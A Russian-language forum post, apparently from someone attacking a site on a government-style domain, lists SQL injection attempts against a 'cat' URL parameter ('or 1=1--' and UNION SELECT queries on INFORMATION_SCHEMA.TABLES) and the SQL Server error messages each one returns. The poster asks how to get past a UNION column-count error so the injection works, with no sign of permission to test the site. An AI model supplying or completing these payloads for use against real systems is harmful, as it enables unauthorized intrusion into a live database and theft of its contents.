Вот наткнулся на сайтик не как не могу понять что делаю не так sql точно есть но вот составить не как не могу вот краткий список моих действий.
_http://site.gov/index.asp?cat=6" or 1=1--
_http://site.gov/index.asp?cat=6' or 1=1--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ' or 1=1--'.
/browsebycategory.asp, line 15
Исполняетьбся ез ошибок Принимает значение "6".
_http://site.gov/index.asp?cat=6 or 1=1--
Такой запрос не сьедает. Ругаеться на кол - во строк.
_http://site.gov/index.asp?cat=6 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/browsebycategory.asp, line 65
Попытка прервать запрос не удаеться.
как с одинарной так и с 2 кавычкой.
_http://site.gov/index.asp?cat=6'; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string '; UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--'.
/browsebycategory.asp, line 15
Ну собственно хотелось бы узнать как составить запрос на выполнение кто может помогите.
Особенно интересует эта ошибка как ее обойти.
Понятно что количество строк не совпадает...
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.
/browsebycategory.asp, line 65